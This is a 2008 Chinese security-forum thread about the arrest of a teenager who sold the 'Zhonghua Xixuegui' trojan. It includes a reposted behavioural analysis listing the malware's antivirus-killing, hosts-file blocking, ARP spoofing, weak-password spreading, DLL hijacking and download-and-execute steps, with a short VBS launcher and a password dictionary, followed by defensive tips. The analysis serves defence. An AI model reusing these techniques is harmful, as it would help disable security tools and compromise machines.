hccccc
中级用户
积分 488
发帖 488
注册 2007-6-17
|
#1 18岁黑客开博卖病毒 扬言饿死杀毒软件商
18岁黑客开博卖病毒 扬言饿死杀毒软件商一种病毒仿佛穿了隐身衣一般,向计算机悄然入侵,杀毒软件却毫无察觉。这是一名18岁的黑客闭门10天的“杰作”,他通过互联网贩卖病毒,甚至扬言要“饿死杀毒软件商”。
7月1日,永川警方将涉嫌制作、传播计算机病毒破坏性程序的小周抓获。据悉,这是我市警方破获的首例此类案件。
网上推销“中华吸血鬼”
“有个叫'黑网之神'的人在网上卖病毒.”6月30日下午,永川区公安局网监支队接到举报电话,举报者称偶然逛到网名为“黑网之神”的人的博客上,发现对方正通过博客贩卖一种名为“中华吸血鬼”的木马下载器及下载器源代码.
“黑网之神”正睡觉遭查获
网监支队立即展开调查,很快锁定了“黑网之神”.7月1日上午10时许,民警在永川区桂山公园附近一居民楼内,将正在睡觉的“黑网之神”小周抓获.小周对自己制作、贩卖“中华吸血鬼”的违法事实供认不讳.
昨日,永川网监支队陈红支队长介绍,网上购买“中华吸血鬼”的人一般都是有搞破坏、甚至犯罪的不良意图,目前警方正对购买过此类病毒的人进一步追查.
10天编出“病毒”
经网监民警审查得知,现年18岁的小周文化程度并不高,中学毕业的他从13岁开始接触计算机,17岁时曾到成都一家计算机专修学校进修一年.他没有正式工作,一有时间就抱着书自学黑客技术.由于现在网上病毒肆虐,小周从中发现了商机.他决定编写一个能破坏杀毒软件、带传播能力的软件卖钱.奋战10天后,他编完了这个名为“中华吸血鬼”的病毒软件.
有人花880元购买
在此期间,他对病毒进行了修改和完善,使其像穿上了“隐身衣”,掩护其他木马程序传播,现有的杀毒软件几乎无法发现这种病毒,甚至能破坏杀毒软件.为了吸引买家的眼球,他的宣传语包括“让杀毒软件商饿死”、“好病毒,中国造”等,并声明:有兴趣的可以免费下载试用版,试用满意再付费购买.据警方事后统计,短时间内就有近500人下载了试用版,其中4人分别以880元的价格购买了正式版.
新闻链接
贩卖传播病毒要遭判刑
据《刑法》规定,违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的; 故意制作、传播计算机病毒等破坏性程序,影响计算机系统正常运行,可处5年以上有期徒刑.
《重庆时报》消息
| |
※ ※ ※ 本文纯属【hccccc】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
 |
|
2008-7-9 12:15 |
|
zeng51120
银牌会员
积分 1073
发帖 1085
注册 2008-3-13
|
#2
强人啊..
| |
※ ※ ※ 本文纯属【zeng51120】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
负责任的男人才是真正的男人........ |
|
|
|
2008-7-9 14:48 |
|
hccccc
中级用户
积分 488
发帖 488
注册 2007-6-17
|
#3 〔转帖〕中华吸血鬼-病毒分析
中华吸血鬼
1转贴关于病毒说明
http://hi.baidu.com/lucifer_yaoh ... 884e38f8dc6181.html
近日来,中华吸血鬼名气很大。。。=.=我最先了解到这个毒,是在卡饭的样本区,此时的吸血鬼已经升级到了2.X。。。
他是通过磁盘底层操作,破坏mbr,导致用户无法开机,详细报告如下:
病毒初始化过程:
1.创建一个互斥量:中华吸血鬼2.2
2.删除SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
3.释放如下副本或文件:
%systemroot%\Tasks\绿化.bat
%systemroot%\Tasks\csrss.exe
%systemroot%\Tasks\wsock32.dll
4.之后创建很多线程,执行多种病毒功能:
(1)通过GetWindowTextA函数获得窗口标题,并比较是否含有如下字样
worm
卡巴斯基
江民
金山
Anti
anti
Virus
virus
Firewall
Mcafee
查杀
主动防御
【请注意文明用语】
系统保护
主 动
主动
杀马
木马
上报
举 报
举报
进 程
进程
系统安全
Process
NOD32
专 杀
专 杀
专杀
安全卫士
绿鹰
...
如果含有则使用PostMessage函数会发送消息给他们:
首先发送一个WM_Destroy,之后发送两个WM_Close 最后发一个WM_Destroy 的消息。并把窗口标题名保存下来。
之后会调用Messageboxa函数弹出一个标题为"Windows盗版验证为"的窗口并显示如下字样“安全提示:您正在使用的(刚刚获得的窗口标题名称)是盗版软件,可能您是盗版软件的受害者,为了给合法用户提供保证,我们无法继续给您提供服务,请到指定销售商购买我们的正版软件,如果有任何疑问,请到我们微软主页查看http://www.microsoft.com”
(2) 破坏冰刃
查找类名为Afxcontrolbar423s的窗口
然后发送WM_Close关闭 再模拟键盘输入按一下回车键
(3) U盘传播功能
检测可移动存储中是否有autorun.inf文件,如果有将其改名
之后向里面写入autorun.inf
创建recycle.{645FF040-5081-101B-9F08-00AA002F954E}文件夹,在该文件夹内写入GHOSTBAK.exe(病毒文件)
(4) 病毒感染统计
搜集被感染主机的mac地址,并把被感染主机的mac地址和感染的病毒版本发送给http://www.*******.cn/tj/ct.asp页面
(5) 修改hosts文件
获得%programfiles%的环境变量,接着查找[url=file://drivers/etc//hosts]\\drivers\etc\\hosts[/url]文件
写入如下数据:
127.0.0.0 360.qihoo.com
127.0.0.1 qihoo.com
127.0.0.1 www.qihoo.com
127.0.0.1 www.qihoo.cn
127.0.0.1 124.40.51.17
127.0.0.1 58.17.236.92
127.0.0.1 www.kaspersky.com
127.0.0.1 60.210.176.251
127.0.0.1 www.cnnod32.cn
127.0.0.1 www.lanniao.org
127.0.0.1 www.nod32club.com
127.0.0.1 www.dswlab.com
127.0.0.1 bbs.sucop.com
127.0.0.1 www.virustotal.com
127.0.0.1 tool.ikaka.com
127.0.0.1 www.jiangmin.com
127.0.0.1 www.duba.net
127.0.0.1 www.eset.com.cn
127.0.0.1 www.nod32.com
127.0.0.1 shadu.duba.net
127.0.0.1 union.kingsoft.com
127.0.0.1 www.kaspersky.com.cn
127.0.0.1 kaspersky.com.cn
127.0.0.1 virustotal.com
127.0.0.1 www.360.cn
127.0.0.1 www.360safe.cn
127.0.0.1 www.360safe.com
127.0.0.1 www.chinakv.com
127.0.0.1 www.rising.com.cn
127.0.0.1 rising.com.cn
127.0.0.1 dl.jiangmin.com
127.0.0.1 jiangmin.com
每1秒循环一次
(6) 遍历进程,调用Terminate Process函数结束如下进程:
AST.exe
360tray.exe
ast.exe
FWMon.exe
(7) 遍历磁盘文件删除扩展名为gho,GHO,Gho的文件
(8) arp欺骗功能
获取本机IP地址 然后把所在同网段内的.2~.255的机器作为欺骗对象
由系统目录下的arps.com执行%s -idx 0 -ip %s -port 80 -insert \"%s的命令 对局域网内机器进行arp欺骗
(9) 局域网弱密码猜解传播
以administrator为用户名,对局域网中其他机器进行密码猜解。如果成功则复制到对方机器的共享的C,D,E,F盘中,以hackshen.exe
病毒猜解的密码字典如下:
woaini
baby
asdf
NULL
angel
asdfgh
1314520
5201314
caonima
88888
bbbbbb
12345678
memory
abc123
qwerty
123456
password
enter
hack
xpuser
money
yeah
time
game
user
home
alex
guest
admin
test
administrator
movie
root
love
(10)删除HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings键
释放一个hackchen.vbs到%systemroot%\Tasks
hackchen.vbs内容:
On Error Resume Next
Set rs=createObject("Wscript.shell")
rs.run "%windir%\Tasks\csrss.exe",0
并且注册HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK} 指向%systemroot%\Tasks\hackchen.vbs
(11) 病毒自动更新功能。在系统目录下释放meupdate.ini文件,并且和http://www.*******.cn/22.txt做比较,如果不同则下载http://www.*******.cn/server.exe(最新版病毒程序)到c:\_default.pif,并且每600ms执行一次
(12)通过查找%ProgramFiles%的环境变量获得程序文件夹路径,之后查找[url=file://WinRAR//Rar.exe]\\WinRAR\\Rar.exe[/url]获得winrar安装路径。
遍历所有分区的.rar,.zip,.tgz,.cab,.tar文件 找到后
后台调用winrar执行"(winrar路径)" -ep a "(找到的rar等文件路径)" %systemroot%\Tasks\绿化.bat 命令
将绿化.bat压缩进压缩包,绿化.bat即为病毒本身,诱使用户点击中毒。
(13)(此方法十分新颖)
遍历所有文件夹并且将%systemroot%\Tasks\wsock32.dll 复制到每个文件夹下
当该文件夹下的exe文件的导入表含有wsock32.dll的时候,会首先调用同文件夹下的wsock32.dll,也就是病毒释放的文件。此时会从下载http://www.*******.cn/server.exe(病毒最新版本)并执行!!!
(14) 查找某些类名为#32770的窗口,并且试图发送"我做了快一个月了,每天2个小时有40-50元的收入,你也来看看吧,长期大量招聘网络兼职http://www.*******.cn/jianzhi.htm"的消息给对方(应该是通过QQ之类的聊天工具传播)
(15) 遍历非系统分区的html,aspx,htm等文件 写入iframe代码
(16)下载木马功能
下载http://www.*******.cn/ft/qq.exe
http://www.*******.cn/cj/qq.exe
并执行
[ Last edited by hccccc on 2008-7-11 at 13:33 ]
| |
※ ※ ※ 本文纯属【hccccc】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2008-7-11 13:32 |
|
hccccc
中级用户
积分 488
发帖 488
注册 2007-6-17
|
#4 随后的感想!(也是转来的,,可不是我想的)
且不论这篇报告的正确与否,光是前面几项动作,就会让大多数人招架不了
看卡饭样本区的帖子,貌似那里的只是一个半成品,仅仅具有写磁盘底层的操作,但也已经极具杀伤力了
目前,本人也没什么时间和经历去深深研究这个病毒,这个病毒也正以惊人的速度更新中,不过能拿到最新样本的,除了花钱,还有就是自己去中一下。。。=.=。。。
那么,我们看看反病毒厂商们,呵呵,这恐怕让很多人失望,众多反病毒厂商至今仍坚持,这不是病毒
Avira,Kaspersky这两家,也是在用户们上报多次,详细写明,换了几个工程师后,才入库确立为病毒的
而瑞星,倒是速度很快,这方面,本地优势,还是利用地很好的,话说,除了这个,RX也没别的啥了。。。
这里也就不贴出解决方案了,目前我也没找到思路明确的解决方法,各位中毒的朋友可以发挥google和baidu的强大搜索引擎,我个人认为目前中吸血鬼的朋友,中的都应该是半成品,可以通过修复分区表,使用专杀,手动清除,解决问题。
那么我们如何防范呢?
从卡饭的样本区,我们能发现,HIPS无疑是表现最好的(屁话)。。。
ThreatFire一马当先high危险级警报,EQ沙盘能够拦截磁盘底层操作,还有众多HIPS,DefenseWall也能拦截,所以,我们大可以如此防御:
先准备好专杀,把网页上的解决办法复制下来,=.=,备用,这是肯定的
然后使用DefenseWall防御,基本杜绝网页传播
HIPS,解决安装程序等情况下病毒的混入
可控制程序联网的防火墙,防止其更新和下载木马
最后,就是备好一张PE光盘,准备好各项工具,这不仅仅是为了防御吸血鬼,任何时候,这都是必需的
好了,不多说了,仅仅是提醒一下各位,这个病毒,嚣张,但是虚张声势,还是需要警惕的
另外,职能部门?能起来干活了!!!
但愿如同很多网友说的那样,吸血鬼喊得越响,死得越快
[ Last edited by hccccc on 2008-7-11 at 13:34 ]
| |
※ ※ ※ 本文纯属【hccccc】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2008-7-11 13:33 |
|
liushilong
高级用户
积分 987
发帖 992
注册 2008-1-23
来自 广东
|
#5
真正的高手都未必是大学毕业的
| |
※ ※ ※ 本文纯属【liushilong】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2008-7-16 05:12 |
|
|
